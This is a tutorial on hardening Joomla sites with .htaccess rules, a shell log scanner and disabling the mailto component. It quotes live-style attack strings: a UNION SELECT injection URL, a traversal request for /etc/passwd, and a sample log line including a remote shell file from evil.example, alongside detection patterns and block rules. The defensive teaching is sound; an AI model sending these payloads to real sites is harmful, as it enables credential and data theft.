
Joomla - How to secure your Joomla website (advanced)

There are many ways a Joomla-powered site (or any other site) can be attacked. Joomla is especially exposed because of the large number of third-party plugins and extensions, many of which contain insecure or even malicious code.

 

Most common website attack techniques

1. XSS vulnerability: cross-site scripting is the injection of malicious script through any input the site reflects or stores without escaping: a search box, a comment field, a URL parameter or any other entry point. If the application does not validate and escape that input before writing it into a page, you have a security issue.

 

2. SQL injection: attacker-controlled input, most often a parameter in the query string of the URL, is concatenated into an SQL statement without being escaped or parameterised. More on how to prevent SQL injection for MySQL.

Example: index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+--+

Everything after id= is the injected SQL: the negative id makes the original SELECT return no rows, and the appended UNION SELECT with 38 columns (the count has to match the original query, which is why attackers probe with 1,2,3,...) lets the attacker place data of his own choosing, e.g. the username and password hash from the Joomla users table, into the page. Depending on the vulnerable statement, injection can also modify or delete records.

Check this site regularly for the latest published Joomla security holes.

 

3. LFI (local file inclusion): a path taken from a request parameter is passed to include/require without validation. For example, Joomla 1.5.15 is vulnerable to this URL request: //index.php?option=com_content&view=frontpage&Itemid=../../../../../../../../../../../../../../../etc/passwd%00

The ../ sequences walk up to the filesystem root, and the trailing %00 (a null byte) makes PHP versions before 5.3.4 stop reading the path there, so any extension the script appends is discarded. The request makes the web server return its own /etc/passwd, which lists the local user accounts (names, UIDs, home directories, shells); the password hashes themselves live in /etc/shadow, but the same inclusion can be pointed at any readable file, including Joomla's configuration.php with the database credentials.

 

How to protect your site from these attacks

The most important measure is to keep your Joomla installation and every extension you use updated to the latest release.

A second, cheap layer of defence is the .htaccess file in your site's root directory (this needs Apache with mod_rewrite, and AllowOverride enabled for the directory):

1. Enable .htaccess: Joomla ships an htaccess.txt file; rename it to .htaccess. If the rules have no visible effect, the host's Apache configuration has AllowOverride None for your directory and the file is silently ignored.

2. Check your Apache access log. When you see an attack (a request that looks like the examples above), block the IP address or even the whole address range. Add the blocked addresses at the bottom of the .htaccess file. For example:

deny from 78.110.50.119
deny from 87.118.96.160
deny from 58.120.

Access is blocked for 78.110.50.119, 87.118.96.160 and the whole range 58.120.0.0 to 58.120.255.255 (58.120.0.0/16). This is Apache 2.2 syntax; Apache 2.4 uses `Require not ip 58.120.0.0/16` inside a `<RequireAll>` block and only accepts the old directives when mod_access_compat is loaded. Blocking by IP is reactive, since attackers simply move to another address, so treat the list as a stopgap rather than a fix.

Note: the crawler from yandex.ru (the Russian search engine) is acting very suspiciously, generating unnecessary network traffic and accessing pages with some odd parameters, e.g. /index.php?start=3. From now on, yandex.ru is on my black list.
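Reading the access log by eye does not scale, so here is an added example (my own, not from the original article) of a small POSIX shell scanner for step 2. It reads Apache access-log lines, flags requests that match the attack shapes described on this page (UNION SELECT, directory traversal or a null byte in a parameter, a remote URL in a parameter) and prints ready-to-paste `deny from` lines. The log lines, IP addresses and hostnames in SAMPLE_LOG are constructed for the demo; the com_x component and evil.example host do not exist.

```shell
#!/bin/sh
# Added example, not part of the original article: scan Apache access-log
# lines for the attack shapes discussed on this page and emit "deny from"
# lines for .htaccess. Everything in SAMPLE_LOG is constructed test data.

SAMPLE_LOG='198.51.100.23 - - [10/Oct/2010:13:55:36 +0200] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.45 - - [10/Oct/2010:13:56:01 +0200] "GET /index.php?option=com_elite_experts&id=-38+union+select+1,2,3,4+--+ HTTP/1.1" 200 412 "-" "libwww-perl/5.8"
203.0.113.45 - - [10/Oct/2010:13:56:02 +0200] "GET /index.php?option=com_content&Itemid=../../../../etc/passwd%00 HTTP/1.1" 200 3001 "-" "libwww-perl/5.8"
192.0.2.77 - - [10/Oct/2010:13:57:10 +0200] "GET /index.php?option=com_x&file=http://evil.example/shell.txt? HTTP/1.1" 404 210 "-" "curl/7.19"
198.51.100.23 - - [10/Oct/2010:13:58:00 +0200] "GET /index.php?option=com_search&searchword=select+a+room HTTP/1.1" 200 4000 "-" "Mozilla/5.0"'

# Attack signatures as one case-insensitive extended regex. Apache logs the
# raw request line, so the URL-encoded spellings (%2e%2e%2f, %20) are listed
# next to the plain ones. The SQL pattern deliberately requires the
# "union ... select" shape rather than a bare "select", so the legitimate
# search for "select a room" in the sample is not flagged.
ATTACK_RE='union([+ ]|%20)+(all([+ ]|%20)+)?select|(\.\.|%2e%2e)(/|%2f)|%00|=(https?|ftp)(:|%3a)(/|%2f){2}'

# attack_ips: read log lines on stdin, print each offending client IP once.
attack_ips() {
    grep -Ei "$ATTACK_RE" | awk '{ print $1 }' | sort -u
}

# deny_lines: the same list formatted as Apache 2.2 "deny from" directives,
# ready to paste at the bottom of .htaccess (on Apache 2.4 use
# "Require not ip" instead).
deny_lines() {
    attack_ips | sed 's/^/deny from /'
}

# Usage: ./scan.sh /var/log/apache2/access.log, or no argument to run the
# scanner over the constructed sample above.
if [ -n "${1:-}" ]; then
    deny_lines < "$1"
else
    printf '%s\n' "$SAMPLE_LOG" | deny_lines
fi
```

Run on the sample it reports 192.0.2.77 and 203.0.113.45 and leaves the visitor who searched for "select a room" alone; the page's own `.*SELECT.*` rule would have blocked that visitor, which is the false-positive problem to keep in mind when tuning signatures.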

3. Write your own conditions with the RewriteCond directive and put them before the first RewriteCond statement in the .htaccess file. RewriteCond lines apply to the RewriteRule that follows them; Joomla's htaccess.txt already contains a block of conditions that ends in a RewriteRule with the [F] flag (403 Forbidden), and each condition you add must end with [OR] so that it chains onto that block. See the syntax of the RewriteCond directive and help on how to write regular expressions.

 

Example on how to prevent LFI:

# block "../.." (directory traversal) in the query string. Note that
# mod_rewrite matches the raw, undecoded query string, so the URL-encoded
# form %2e%2e%2f is not caught by this pattern.
RewriteCond %{QUERY_STRING} .*[.][.]/[.][.].* [OR]

# block "http://" in the query string (remote file inclusion)...
RewriteCond %{QUERY_STRING} .*http://.* [NC,OR]

 

Prevent SQL injection (these are broad keyword matches: any query string containing the word 'select' or 'delete', including an ordinary search term, is blocked as well):

# block SQL INJECTION 'select'
RewriteCond %{QUERY_STRING} .*SELECT.* [NC,OR]

# block SQL INJECTION 'delete'
RewriteCond %{QUERY_STRING} .*DELETE.* [NC,OR]

# block SQL INJECTION 'jos_users' (the Joomla user table)
RewriteCond %{QUERY_STRING} .*jos_users.* [NC,OR]
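The snippets above are fragments that only work once they are chained onto the rule already present in Joomla's htaccess.txt. As an added example (mine, not the article's file), here is a self-contained block that carries its own RewriteRule, lists the URL-encoded spellings next to the plain ones, narrows the SQL pattern to the UNION ... SELECT shape so a search term is not blocked, and shows the IP blocks in both the Apache 2.2 and 2.4 syntax. It assumes Apache with mod_rewrite loaded and AllowOverride enabled for the site directory; the blocked addresses are the ones from the article.

```apache
# Added example, not the article's own .htaccess: a complete mod_rewrite
# block that turns the conditions discussed above into working rules.
RewriteEngine On

## File inclusion (LFI/RFI). mod_rewrite matches the raw, undecoded query
## string, so URL-encoded spellings have to be listed explicitly.
# directory traversal, plain ("../") or encoded ("%2e%2e%2f")
RewriteCond %{QUERY_STRING} (\.\.|%2e%2e)(/|%2f) [NC,OR]
# null byte used to truncate the include path (e.g. /etc/passwd%00)
RewriteCond %{QUERY_STRING} %00 [OR]
# a parameter pointing at a remote URL (remote file inclusion)
RewriteCond %{QUERY_STRING} =(https?|ftp)(:|%3a)(/|%2f){2} [NC,OR]

## SQL injection. Spaces arrive as "+" or "%20" in a query string. The
## pattern requires "union ... select" or a reference to the Joomla user
## table rather than a bare "select", so a search for "select a room"
## is not blocked.
RewriteCond %{QUERY_STRING} union(\+|%20)+(all(\+|%20)+)?select [NC,OR]
RewriteCond %{QUERY_STRING} jos_users [NC]

# The last condition carries no [OR]; the conditions are ORed together and
# any match fires this rule, which answers 403 Forbidden before PHP runs.
RewriteRule .* - [F,L]

## IP blocking, both syntaxes so the file works on Apache 2.2 and 2.4.
<IfModule !mod_authz_core.c>
    # Apache 2.2
    Order allow,deny
    Allow from all
    Deny from 78.110.50.119
    Deny from 87.118.96.160
    Deny from 58.120.
</IfModule>
<IfModule mod_authz_core.c>
    # Apache 2.4
    <RequireAll>
        Require all granted
        Require not ip 78.110.50.119
        Require not ip 87.118.96.160
        Require not ip 58.120.0.0/16
    </RequireAll>
</IfModule>
```

To check that the rules are live, request your own site with an obviously hostile parameter, e.g. `curl -sI 'http://yoursite.example/index.php?id=1+union+select+1'`, and confirm the first response line is a 403; an ordinary article URL must still return 200. Remember that these conditions only see the query string, not POST bodies or cookies, so they complement updates and parameterised queries rather than replace them.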

These rules do not make the site 100% safe (a signature can be evaded with encoding or alternative syntax, and they only inspect the query string, not POST bodies), but if you implement the basic precautions from my previous article on how to secure a Joomla site, add these rules and update regularly, your site will be hard to crack.

Note 1: this only works on Apache with mod_rewrite and .htaccess overrides enabled, which is the usual Linux shared-hosting setup; IIS and nginx ignore .htaccess.

Note 2: these restrictions can block legitimate requests (e.g. a search for a word containing 'select'). If something stops working, comment the conditions out one at a time (prefix the line with #) until you find the one responsible.

 

4. Disable the mailto component: as of Joomla 1.5.15 I've noticed that the /index.php/component/mailto/ path is at the top of the list of accessed paths/documents. Furthermore, I've received admin e-mails stating that e-mail could not be delivered. I can't be sure, but I think the mailto component has a security issue that allows attackers to use it for sending spam. Note: if you disable the mailto component, the features that depend on it (the 'E-mail this article' link) will no longer work.

How to disable mailto component:

1. Disable the e-mail icon in all articles. By default every article has 'Show Email Icon' = Use Global Settings. To change this global setting, go to Article Manager, select all articles, then click the 'Parameters' button in the upper right corner and set 'Show Email Icon' = False.

2. Rename the mailto component: go to your Joomla root directory, enter /components and rename com_mailto to something else, e.g. old_com_mailto. Renaming rather than deleting lets you restore it later if needed.

3. Reset the admin e-mail settings under Site / Global Configuration / System / Mail Settings and set the mailer to an SMTP server. With the component renamed, any attempt to misuse the mailto component now produces an error instead of sending mail.